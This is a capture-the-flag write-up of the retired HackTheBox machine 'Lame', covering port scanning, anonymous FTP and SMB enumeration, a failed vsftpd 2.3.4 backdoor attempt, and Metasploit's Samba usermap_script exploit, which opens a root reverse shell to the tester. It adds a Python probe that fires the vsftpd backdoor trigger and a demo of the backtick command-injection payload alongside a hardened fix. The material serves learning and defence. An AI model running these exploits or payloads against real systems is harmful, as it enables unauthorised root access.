Lame

This is a retired box from HackTheBox (HTB). Since it is part of TJnull's list for OSCP preparation, I had to tackle it.

Intelligence Gathering

Let’s look at open ports.

PORT    STATE SERVICE      REASON
21/tcp  open  ftp          syn-ack ttl 63
22/tcp  open  ssh          syn-ack ttl 63
139/tcp open  netbios-ssn  syn-ack ttl 63
445/tcp open  microsoft-ds syn-ack ttl 63

Let's get the service versions and run the default nmap scripts (-sV -sC) against these open ports.

PORT    STATE SERVICE     REASON         VERSION
21/tcp  open  ftp         syn-ack ttl 63 vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.8
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
139/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OS: Unix

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59488/tcp): CLEAN (Timeout)
|   Check 2 (port 31947/tcp): CLEAN (Timeout)
|   Check 3 (port 15886/udp): CLEAN (Timeout)
|   Check 4 (port 40169/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

Enumeration

FTP Enumeration

FTP servers are often configured to allow anonymous login: the username is anonymous and the password can be anything (by convention an e-mail address), which is exactly what the ftp-anon script flagged above. As shown below, that gets us onto the target's FTP server.

➜  ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:retr0x01): anonymous
331 Please specify the password.
Password: (anonymous, not echoed to the screen)
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Although we could log in, there was nothing to find on the FTP server.

Let's look for known vulnerabilities in the exact version we fingerprinted. searchsploit immediately turns up the vsftpd 2.3.4 backdoor (CVE-2011-2523).

➜  searchsploit vsftp
--------------------------------------------------------------------------------- ------------------------------
 Exploit Title                                                                    |  Path
--------------------------------------------------------------------------------- ------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                    | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                    | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                    | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                                  | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution                                         | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                            | unix/remote/17491.rb
vsftpd 3.0.3 - Remote Denial of Service                                           | multiple/remote/49719.py
--------------------------------------------------------------------------------- ------------------------------

There are two entries for the 2.3.4 backdoor: a standalone Python script and a Metasploit module. Let's mirror the Python one to our host and try it first.

➜  searchsploit vsftp -m 49757
[!] Could not find EDB-ID #

  Exploit: vsftpd 2.3.4 - Backdoor Command Execution
      URL: https://www.exploit-db.com/exploits/49757
     Path: /snap/searchsploit/62/opt/exploitdb/exploits/unix/remote/49757.py
    Codes: CVE-2011-2523
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/Lame/Exploitation/vsftpd_2.3.4_Exploit/49757.py

The standalone script did not get us a shell. Let's try the automated way with the Metasploit framework (MSF) module instead.

#Firstly, we search for the exploit on msf
msf6 > search vsftp
#Secondly, we use the exploit (index 0 of the search results, exploit/unix/ftp/vsftpd_234_backdoor)
msf6 > use 0
#Third, we check the options needed to run the exploit
msf6 > show options
#Fourth, we set the needed arguments
msf6 > set rhosts 10.10.10.3
#Finally we run the exploit
msf6 > exploit

After the module's wait, no session came back:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
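To understand that "no session was created" line, it helps to see the two halves of the backdoor separately. The trojaned vsftpd 2.3.4 arms itself when the USER argument contains ":)" and, while processing the PASS, forks a listener on TCP 6200; the module sends the trigger and then tries to connect to 6200. The probe below, an added example and not the post's own code nor the exploit-db or Metasploit code, does the same exchange but reports which half failed. The stand-in server is constructed here so it runs offline; host and port numbers are arbitrary.

```python
"""Probe for the vsftpd 2.3.4 backdoor (CVE-2011-2523) that reports *why* it fails.

Added example, not the post's own code.  Relies only on the public behaviour of
the trojaned binary: a USER containing ':)' makes it open a root shell on TCP 6200.
FakeVsftpd is a constructed stand-in so the probe can run offline.
"""
import socket
import threading
import time

TRIGGER_USER = b"USER lame:)\r\n"   # ':)' anywhere in the name arms the backdoor
TRIGGER_PASS = b"PASS lame\r\n"     # the listener is forked while PASS is handled
BACKDOOR_PORT = 6200


def _expect(sock, code):
    """Read one reply and check its 3-digit code; False on timeout or close."""
    try:
        return sock.recv(1024).startswith(code)
    except OSError:
        return False


def probe(host, ftp_port=21, shell_port=BACKDOOR_PORT, timeout=3.0, attempts=5):
    """Return 'unreachable', 'no-banner', 'user-rejected', 'triggered-no-shell' or 'shell'.

    'triggered-no-shell' is the state behind Metasploit's "Exploit completed, but
    no session was created": the trigger was accepted, but nothing answered on
    the shell port (filtered on the way, or a clean binary).
    """
    try:
        ctl = socket.create_connection((host, ftp_port), timeout=timeout)
    except OSError:
        return "unreachable"
    with ctl:
        if not _expect(ctl, b"220"):
            return "no-banner"
        ctl.sendall(TRIGGER_USER)
        if not _expect(ctl, b"331"):
            return "user-rejected"
        ctl.sendall(TRIGGER_PASS)
        # The listener is forked by the daemon, so give it a moment to appear.
        for _ in range(attempts):
            try:
                sh = socket.create_connection((host, shell_port), timeout=timeout)
                break
            except OSError:
                time.sleep(0.2)
        else:
            return "triggered-no-shell"
        with sh:
            sh.sendall(b"id\n")
            try:
                out = sh.recv(1024)
            except OSError:
                out = b""
    return "shell" if b"uid=" in out else "triggered-no-shell"


class FakeVsftpd:
    """Constructed stand-in serving one control connection like a trojaned vsftpd.

    backdoor_listens=False models what this post saw on Lame: USER/PASS are
    accepted, but nothing ever listens on the shell port.
    """

    def __init__(self, backdoor_listens=True):
        self.backdoor_listens = backdoor_listens
        self.ftp = socket.socket()
        self.ftp.bind(("127.0.0.1", 0))
        self.ftp.listen(1)
        self.shell = socket.socket()
        self.shell.bind(("127.0.0.1", 0))   # bound only: refused until listen()
        self.ftp_port = self.ftp.getsockname()[1]
        self.shell_port = self.shell.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        conn, _ = self.ftp.accept()
        with conn:
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            user = conn.recv(1024)
            conn.sendall(b"331 Please specify the password.\r\n")
            conn.recv(1024)                           # the PASS line
            if b":)" in user and self.backdoor_listens:
                self.shell.listen(1)
                sh, _ = self.shell.accept()
                with sh:
                    sh.recv(1024)                     # whatever the client sends first
                    sh.sendall(b"uid=0(root) gid=0(root) groups=0(root)\n")
            else:
                conn.sendall(b"530 Login incorrect.\r\n")


def demo():
    """Probe an armed stand-in and a blocked one; returns both verdicts."""
    armed = FakeVsftpd(backdoor_listens=True)
    blocked = FakeVsftpd(backdoor_listens=False)
    return {
        "backdoor reachable": probe("127.0.0.1", armed.ftp_port, armed.shell_port),
        "backdoor blocked": probe("127.0.0.1", blocked.ftp_port, blocked.shell_port),
    }


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case}: {verdict}")
```

Against a real target you would call probe("10.10.10.3") and expect "triggered-no-shell" for the situation shown above: the 331 proves the trigger was accepted, and the verdict tells you not to keep hammering the module but to check whether 6200 is even reachable before spending more time on this path.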

Since we cannot reach the backdoor shell, let's move on and enumerate the next service.

SMB Enumeration

SMB, served here by Samba, is also usually generous to anonymous enumeration. First, let's list the shares and the permissions a null session has on them with smbmap.

➜  smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445  Name: 10.10.10.3                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))

smbmap lists every share together with the permissions our anonymous session has on it. Here we can read and write the tmp share (comment "oh noes!"), but browsing it anonymously did not get us anywhere. The more useful detail is in the IPC$ comment: Samba 3.0.20-Debian. Googling that version led to an article on the "username map script" command-injection bug in Samba 3.0.20 through 3.0.25rc3 (CVE-2007-2447), which is what we exploit next.

User & Privesc

The box is lame for a reason: the injected command runs as the smbd user, which is root, so there is no separate user step and no privilege escalation. We land with superuser privileges straight away.

#Firstly, we search for the exploit on msf
msf6 > search samba 3
#Secondly, we use the exploit
msf6 > use exploit/multi/samba/usermap_script
#Third, we check the options needed to run the exploit
msf6 > show options
#Fourth, we set the remote host
msf6 > set rhosts 10.10.10.3
#Fifth, we set our listener address to the VPN interface (msf resolves tun0 to its IP)
msf6 > set lhost tun0
#Finally, run the exploit
msf6 > exploit
#Results
msf6 exploit(multi/samba/usermap_script) > exploit 

[*] Started reverse TCP handler on 10.10.16.8:4444 
[*] Command shell session 1 opened (10.10.16.8:4444 -> 10.10.10.3:55027) at 2023-01-19 03:17:00 -0600

whoami
root
pwd
/
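Why a crafted SMB username turns into a root shell here: Samba's "username map script" option ran the configured script through /bin/sh -c with the client-supplied username pasted into the command string unescaped, so backticks in the username are executed before the script ever sees its argument. The example below is added here and is not Samba's code nor the Metasploit module; the map script is a constructed stand-in for an administrator's real one, and the hardened variant applies the general fix (argv list, no shell) rather than reproducing Samba's own patch.

```python
"""Vulnerable vs. hardened invocation of a 'username map script' (CVE-2007-2447 pattern).

Added example, not Samba's code.  MAP_SCRIPT is constructed for the demo; the
hardened variant uses the generic fix (no shell), not Samba's actual patch.
"""
import os
import subprocess
import tempfile

SH = "/bin/sh"

# Constructed stand-in for an admin's map script: maps one Windows-side name
# to a Unix account and echoes everything else unchanged.
MAP_SCRIPT = """#!/bin/sh
case "$1" in
  administrator) echo root ;;
  *)             echo "$1" ;;
esac
"""


def write_map_script():
    """Write MAP_SCRIPT to a temp file and return its path (caller deletes it)."""
    fd, path = tempfile.mkstemp(suffix=".sh")
    with os.fdopen(fd, "w") as f:
        f.write(MAP_SCRIPT)
    return path


def map_user_vulnerable(script, username):
    """The CVE-2007-2447 shape: one command string handed to a shell, so
    backticks, ';' and friends inside the SMB username are executed."""
    cmd = f"{SH} {script} {username}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def map_user_hardened(script, username):
    """No shell in the loop: the username is a single argv element, however hostile."""
    argv = [SH, script, username]
    return subprocess.run(argv, capture_output=True, text=True).stdout.strip()


def demo():
    """Run both variants on a benign name and on an injecting one."""
    script = write_map_script()
    # Same backtick command-substitution shape the usermap_script module sends
    # as the SMB username; it wraps a reverse-shell payload where 'echo' is here.
    hostile = "/=`echo INJECTED`"
    try:
        return {
            "benign, vulnerable": map_user_vulnerable(script, "administrator"),
            "benign, hardened": map_user_hardened(script, "administrator"),
            "hostile, vulnerable": map_user_vulnerable(script, hostile),
            "hostile, hardened": map_user_hardened(script, hostile),
        }
    finally:
        os.unlink(script)


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result!r}")
```

In the vulnerable path the shell substitutes the backtick expression first, so the script receives "/=INJECTED" and the injected command has already run; in the hardened path the script receives the backticks literally and nothing executes. Because smbd itself runs as root, whatever that substitution executes runs as root too, which is why there is no privilege-escalation step on this box. An allowlist on the username (letters, digits, dot, dash, underscore) is cheap defence in depth on top of dropping the shell.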

The box is done. Since we already have the highest privilege, all that is left is to browse the filesystem and collect the flags. It was lame because of the vsftpd rabbit hole and the one-shot exploitation, but a great box overall.

Thanks for reading, enjoy!

This post is licensed under CC BY 4.0 by the author.